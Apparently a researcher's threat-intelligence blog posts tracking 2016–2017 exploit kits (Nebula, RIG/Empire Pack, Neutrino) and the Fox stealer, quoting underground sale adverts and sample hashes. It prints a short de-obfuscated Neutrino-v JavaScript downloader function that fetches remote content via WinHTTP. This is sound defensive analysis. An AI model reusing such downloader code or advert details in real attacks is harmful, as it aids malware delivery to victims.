Nebula Logo

While Empire (RIG-E) disappeared at the end of December after 4 months of activity

Illustration of  the last month of witnessed Activity for Empire

on 2017-02-17 an advert for a new exploit kit dubbed Nebula appeared underground.

------
Selling EK Nebula
------
Nebula Exploit kit

Features:
-Automatic domain scanning and generating (99% FUD)
-API rotator domains
-Exploit rate tested in different traffic go up 8/19%
-knock rate tested whit popular botnet go 30/70%
-Clean and modern user interface
-Custom domains & server ( add & point your own domains coming soon...)
-Unlimited flows & files
-Scan file & domains
-Multiple payload file types supported (exe , dll , js, vbs)
-Multi. geo flow (split loads by country & file)
-Remote file support ( check every 1 minute if file hash change ; if changed replace ) for automatic crypting
-Public stats by file & flow
-latest CVE-2016 CVE-2017
-custom features just ask support

Subscriptions:
24h - 100$
7d - 600$
31d - 2000$

Jabber - [email protected]


Offering free tests to trusted users 
------

In same thread some screenshots were shared by a customer.

"GamiNook" redirecting to a Sundown Variation in Japan - 2017-02-17 Payload : Pitou (6f9d71eebe319468927f74b93c820ce4 )

"GamiNook" traffic with geo in France - 2017-02-17 Identicall payload call gives you Gootkit instead of Pitou Payload : Gootkit (48ae9a5d10085e5f6a1221cd1eedade6)

Taxonomy tied to Nebula Activity in MISP - 2017-03-02

(for those who would like to build their regexp, more pattern available here : https://raw.githubusercontent.com/Kafeine/public/master/Nebula_URI )

2017-03-02 Nebula with its new pattern used here to drop Ramnit via Malvertising in NA - 2017-03-02

CVE-2016-7200 & CVE-2016-7201 are vulnerabilities in the Chakra JavaScript scripting engine in Microsoft Edge. Reported by Natalie Silvanovich of Google Project Zero, those have been fixed  in november 2016 (MS16-129) by Microsoft.

Note : No successful exploitation seen despite integration tries.

On 2017-01-04 @theori_io released a POC

Proof-of-Concept exploit for Edge bugs (CVE-2016-7200 & CVE-2016-7201) —https://t.co/DnwQt5giMB

— Theori (@theori_io) 4 janvier 2017

providing again (cf CVE-2016-0189) ready-to-use code to Exploit Kit maintainer.

After not far from 6 months without new exploit integrated in an EK ecosystem which has lost its innovation locomotive (Angler) , the drive-by landscape is struggling to stay in shape. Low infection rate means more difficulties to properly convert bought traffic.

The exploits are spotted first in Sundown, but integration in RIG/Empire/Neutrino/Magnitude/Kaixin should be a matter of hours/days.

[edit : 2017-01-10]
​I have been told that with Win10 1607, Microsoft Edge has some quite strong mitigation: no WinExec, no CreateProcess, no ShellExecute, meaning every child process creation is blocked. The PoC might need a little more "magic powder" to work there.
[/edit]

  

Around the middle of August many infection chains transitioned to RIG with more geo-focused bankers and less CryptXXX (CryptMic) Ransomware.



Picture 1: Select Drive-by landscape - Middle of August 2016 vs Middle of July 2016

RIG += internal TDS :

Trying to understand that move, I suspected and confirmed the presence of an internal TDS (Traffic Distribution System) inside RIG Exploit Kit [Edit 2016-10-08 : It seems this functionality is limited to Empire Pack version of RIG]
I believe this feature appeared in the EK market with Blackhole (if you are aware of a TDS integrated earlier directly in an EK please tell me)

Picture2: Blackhole - 2012 - Internal TDS illustration

but disappeared from the market with the end of Nuclear Pack

Picture3: Nuclear Pack - 2016-03-09 - Internal TDS illustration

and Angler EK

Picture 4 : Angler EK - Internal TDS illustration

This is a key feature for load seller. It is making their day to day work with traffic provider far easier .
It allows Exploit Kit operator to attach multiple payloads to a unique thread. The drop will be conditioned by Geo (and/or OS settings) of the victim.

Obviously you can achieve the same result with any other exploit kit…but things are a little more difficult. You have to create one Exploit Kit thread per payload, use an external TDS (like Keitaro/Sutra/BlackHat TDS/SimpleTDS/BossTDS, etc…) and from that TDS, point the traffic to the correct Exploit Kit thread (or, if you buy traffic, tell your traffic provider where to send traffic for each targeted country).

Picture 5: A Sutra TDS in action in 2012 - cf The path to infection

RIG += RC4 encryption, dll drop and CVE-2016-0189:

Around 2016-09-12 a variation of RIG (which i flag as RIG-v in my systems) appeared.
A slightly different landing obfuscation, RC4 encoding, Neutrino-ish behavioral and added CVE-2016-0189

Picture 6: RIG-v Neutrino-ish behavioral captured by Brad Spengler’s modified cuckoo

Picture 7: CVE-2016-0189 from RIG-v after 3 step de-obfuscation pass.

Neutrino waves goodbye ?

On 2016-09-09 on underground it has been reported a message on Jabber from the Neutrino seller account :

“we are closed. no new rents, no extends more”

This explains a lot. Here are some of my last Neutrino pass for past month.
Picture 8: Some Neutrino passes for past month and associated taxonomy tags in Misp

As you can see several actors were still using it…Now here is what i get for the past days :
Picture 9: Past days in DriveBy land
Not shown here, Magnitude is still around, mostly striking in Asia

Day after day, each of them transitioned to RIG or “RIG-v”. Around the 22nd of September 2016 the Neutrino advert and banner disappeared from underground.


Picture 10: Last banner for Neutrino as of 2016-09-16

Are we witnessing the end of Neutrino Exploit Kit ? To some degree. In fact it looks more like Neutrino is going in full “Private” mode “a la” Magnitude.

Side reminder : Neutrino disappeared from march 2014 till november 2014

A Neutrino Variant

Several weeks ago, Trendmicro (Thanks!!) made me aware of a malvertising chain they spotted in Korea and Taiwan involving Neutrino.

Picture 11: Neutrino-v pass on the 2016-09-21

Upon replay I noticed that this Neutrino was somewhat different. Smoother CVE-2016-4117, more randomization in the landing, slightly modified flash bundle of exploits

Picture 12: Neutrino-v flash ran into Maciej ‘s Neutrino decoder
Note the pnw26 with no associated binary data, the rubbish and additionalInfo

A Sample : 607f6c3795f6e0dedaa93a2df73e7e1192dcc7d73992cff337b895da3cba5523



Picture 13: Neutrino-v behavioral is a little different : drops name are not generated via the GetTempName api

 function k2(k) {
     var y = a(e + "." + e + "Request.5.1");
     y.setProxy(n);
     y.open("GET", k(1), n);
     y.Option(n) = k(2);
     y.send();
     if (200 == y.status) return Rf(y.responseText, k(n))
 };

Neutrino-v ensuring Wscript will use the default proxy (most often when a proxy is configured it’s only for WinINet , WinHTTP proxy is not set and Wscript will try to connect directly and fail)

I believe this Neutrino variant is in action in only one infection chain (If you think this is inaccurate, i’d love to hear about it)

Picture 14: Neutrino-v seems to be used by only one actor to spread Cerber 0079x

The actor behind this chain is the same as the one featured in the Malwarebytes Neutrino EK: more Flash trickery post.

Empire Pack:

Coincidentally a new Exploit Kit is being talked about underground : Empire Pack. Private, not advertised.

Picture 15: King of Loads - Empire Pack Panel

Some might feel this interface quite familiar…A look a the favicon will give you a hint

Picture 16: RIG EK favicon on Empire Pack panel


Picture 17: RIG Panel

It seems Empire Pack project was thought upon Angler EK disappearance and launched around the 14th of August 2016.

[Speculation]
I think this launch could be related to the first wave of switch to RIG that occurred around that time. I think, Empire Pack is a RIG instance managed by a Reseller/Load Seller with strong underground connections.
[/Speculation]

RIG-v is a “vip” version of RIG. Now how exactly those three elements (RIG, RIG-v, Empire Pack) are overlapping, I don’t know. I am aware of 3 variants of the API to RIG

• api.php : historical RIG
• api3.php : RIG with internal TDS [ 2016-10-08 :  This is Empire Pack. Appears to be using also remote_api after this post went live. I flag it as RIG-E ]
• remote_api.php : RIG-v

Gift for SweetTail-Fox-mlp  by Mad-N-Monstrous

Small data drop about another Pony fork : Fox stealer.
First sample of this malware I saw was at beginning of September 2016 thanks to Malc0de. After figuring out the panel name and to which advert it was tied we were referring to it as PonyForx.

Advert :
2016-08-11 - Sold underground by a user going with nickname "Cronbot"

--------
Стилер паролей и нетолько - Fox v1.0

Мы выпускаем продукт на продажу. Уже проходит финальная стадия тестирования данного продукта.

О продукте : 
1. Умеет все что умеет пони. + добавлен новый софт.
2. Актуален на 2016 год.
3. Написан на С++ без дополнительных библиотек.
4. Админка от пони.

Условия : 
1. Только аренда.
2. Распространяется в виде EXE и DLL.
3. Исходники продавать не будем.

Аренда 250$ в месяц.
Исходники 2000$ разово.

It's being loaded (with Locky Affid 13) by the Godzilla from ScriptJS (aka AfraidGate) group .

MISP taxonomy tags reflecting ScriptJS activity in the last months

(note : it's not the first time this group is pushing a stealer, they were dropping Pony with their Necurs between August and December 2015 [1] )

2016-09-26 - ScriptJS infection chain into Neutrino into Godzilla loader into PonyForx and Locky Affid 13 Here we can see the browsing history of the VM being sent to PonyForx (Fox stealer) C2

Fox stealer (PonyForx) fingerprint in Cuckoo

Sample :